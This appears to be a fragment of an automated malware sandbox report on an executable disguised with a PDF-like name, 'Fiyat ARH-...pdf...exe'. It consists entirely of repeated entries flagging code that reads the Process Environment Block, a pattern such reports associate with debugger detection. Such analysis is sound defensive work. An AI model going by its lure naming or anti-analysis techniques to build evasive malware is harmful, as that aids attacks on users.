            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B52349 mov eax, dword ptr fs:[00000030h]7_2_01B52349
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE02A0 mov eax, dword ptr fs:[00000030h]7_2_01AE02A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE02A0 mov eax, dword ptr fs:[00000030h]7_2_01AE02A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B662A0 mov eax, dword ptr fs:[00000030h]7_2_01B662A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B662A0 mov ecx, dword ptr fs:[00000030h]7_2_01B662A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B662A0 mov eax, dword ptr fs:[00000030h]7_2_01B662A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B662A0 mov eax, dword ptr fs:[00000030h]7_2_01B662A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B662A0 mov eax, dword ptr fs:[00000030h]7_2_01B662A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B662A0 mov eax, dword ptr fs:[00000030h]7_2_01B662A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E284 mov eax, dword ptr fs:[00000030h]7_2_01B0E284
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E284 mov eax, dword ptr fs:[00000030h]7_2_01B0E284
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B50283 mov eax, dword ptr fs:[00000030h]7_2_01B50283
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B50283 mov eax, dword ptr fs:[00000030h]7_2_01B50283
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B50283 mov eax, dword ptr fs:[00000030h]7_2_01B50283
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE02E1 mov eax, dword ptr fs:[00000030h]7_2_01AE02E1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE02E1 mov eax, dword ptr fs:[00000030h]7_2_01AE02E1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE02E1 mov eax, dword ptr fs:[00000030h]7_2_01AE02E1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA62D6 mov eax, dword ptr fs:[00000030h]7_2_01BA62D6
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA2C3 mov eax, dword ptr fs:[00000030h]7_2_01ADA2C3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA2C3 mov eax, dword ptr fs:[00000030h]7_2_01ADA2C3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA2C3 mov eax, dword ptr fs:[00000030h]7_2_01ADA2C3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA2C3 mov eax, dword ptr fs:[00000030h]7_2_01ADA2C3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADA2C3 mov eax, dword ptr fs:[00000030h]7_2_01ADA2C3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC823B mov eax, dword ptr fs:[00000030h]7_2_01AC823B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC826B mov eax, dword ptr fs:[00000030h]7_2_01AC826B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B80274 mov eax, dword ptr fs:[00000030h]7_2_01B80274
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4260 mov eax, dword ptr fs:[00000030h]7_2_01AD4260
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4260 mov eax, dword ptr fs:[00000030h]7_2_01AD4260
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD4260 mov eax, dword ptr fs:[00000030h]7_2_01AD4260
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA625D mov eax, dword ptr fs:[00000030h]7_2_01BA625D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8A250 mov eax, dword ptr fs:[00000030h]7_2_01B8A250
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8A250 mov eax, dword ptr fs:[00000030h]7_2_01B8A250
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD6259 mov eax, dword ptr fs:[00000030h]7_2_01AD6259
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B58243 mov eax, dword ptr fs:[00000030h]7_2_01B58243
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B58243 mov ecx, dword ptr fs:[00000030h]7_2_01B58243
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACA250 mov eax, dword ptr fs:[00000030h]7_2_01ACA250
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B505A7 mov eax, dword ptr fs:[00000030h]7_2_01B505A7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B505A7 mov eax, dword ptr fs:[00000030h]7_2_01B505A7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B505A7 mov eax, dword ptr fs:[00000030h]7_2_01B505A7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF45B1 mov eax, dword ptr fs:[00000030h]7_2_01AF45B1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF45B1 mov eax, dword ptr fs:[00000030h]7_2_01AF45B1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E59C mov eax, dword ptr fs:[00000030h]7_2_01B0E59C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD2582 mov eax, dword ptr fs:[00000030h]7_2_01AD2582
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD2582 mov ecx, dword ptr fs:[00000030h]7_2_01AD2582
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B04588 mov eax, dword ptr fs:[00000030h]7_2_01B04588
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE5E7 mov eax, dword ptr fs:[00000030h]7_2_01AFE5E7
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD25E0 mov eax, dword ptr fs:[00000030h]7_2_01AD25E0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C5ED mov eax, dword ptr fs:[00000030h]7_2_01B0C5ED
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0C5ED mov eax, dword ptr fs:[00000030h]7_2_01B0C5ED
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A5D0 mov eax, dword ptr fs:[00000030h]7_2_01B0A5D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A5D0 mov eax, dword ptr fs:[00000030h]7_2_01B0A5D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD65D0 mov eax, dword ptr fs:[00000030h]7_2_01AD65D0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E5CF mov eax, dword ptr fs:[00000030h]7_2_01B0E5CF
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E5CF mov eax, dword ptr fs:[00000030h]7_2_01B0E5CF
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h]7_2_01AFE53E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h]7_2_01AFE53E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h]7_2_01AFE53E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h]7_2_01AFE53E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h]7_2_01AFE53E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h]7_2_01AE0535
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B66500 mov eax, dword ptr fs:[00000030h]7_2_01B66500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h]7_2_01BA4500
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0656A mov eax, dword ptr fs:[00000030h]7_2_01B0656A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0656A mov eax, dword ptr fs:[00000030h]7_2_01B0656A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0656A mov eax, dword ptr fs:[00000030h]7_2_01B0656A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD8550 mov eax, dword ptr fs:[00000030h]7_2_01AD8550
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD8550 mov eax, dword ptr fs:[00000030h]7_2_01AD8550
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B044B0 mov ecx, dword ptr fs:[00000030h]7_2_01B044B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5A4B0 mov eax, dword ptr fs:[00000030h]7_2_01B5A4B0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD64AB mov eax, dword ptr fs:[00000030h]7_2_01AD64AB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8A49A mov eax, dword ptr fs:[00000030h]7_2_01B8A49A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD04E5 mov ecx, dword ptr fs:[00000030h]7_2_01AD04E5
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0A430 mov eax, dword ptr fs:[00000030h]7_2_01B0A430
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACC427 mov eax, dword ptr fs:[00000030h]7_2_01ACC427
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACE420 mov eax, dword ptr fs:[00000030h]7_2_01ACE420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACE420 mov eax, dword ptr fs:[00000030h]7_2_01ACE420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACE420 mov eax, dword ptr fs:[00000030h]7_2_01ACE420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h]7_2_01B56420
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B08402 mov eax, dword ptr fs:[00000030h]7_2_01B08402
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B08402 mov eax, dword ptr fs:[00000030h]7_2_01B08402
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B08402 mov eax, dword ptr fs:[00000030h]7_2_01B08402
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5C460 mov ecx, dword ptr fs:[00000030h]7_2_01B5C460
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFA470 mov eax, dword ptr fs:[00000030h]7_2_01AFA470
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFA470 mov eax, dword ptr fs:[00000030h]7_2_01AFA470
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFA470 mov eax, dword ptr fs:[00000030h]7_2_01AFA470
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B8A456 mov eax, dword ptr fs:[00000030h]7_2_01B8A456
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC645D mov eax, dword ptr fs:[00000030h]7_2_01AC645D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h]7_2_01B0E443
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF245A mov eax, dword ptr fs:[00000030h]7_2_01AF245A
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD07AF mov eax, dword ptr fs:[00000030h]7_2_01AD07AF
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B847A0 mov eax, dword ptr fs:[00000030h]7_2_01B847A0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7678E mov eax, dword ptr fs:[00000030h]7_2_01B7678E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF27ED mov eax, dword ptr fs:[00000030h]7_2_01AF27ED
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF27ED mov eax, dword ptr fs:[00000030h]7_2_01AF27ED
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF27ED mov eax, dword ptr fs:[00000030h]7_2_01AF27ED
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5E7E1 mov eax, dword ptr fs:[00000030h]7_2_01B5E7E1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD47FB mov eax, dword ptr fs:[00000030h]7_2_01AD47FB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD47FB mov eax, dword ptr fs:[00000030h]7_2_01AD47FB
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADC7C0 mov eax, dword ptr fs:[00000030h]7_2_01ADC7C0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B507C3 mov eax, dword ptr fs:[00000030h]7_2_01B507C3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4C730 mov eax, dword ptr fs:[00000030h]7_2_01B4C730
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0273C mov eax, dword ptr fs:[00000030h]7_2_01B0273C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0273C mov ecx, dword ptr fs:[00000030h]7_2_01B0273C
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0273C mov eax, dword ptr fs:[00000030h]7_2_01B0273C
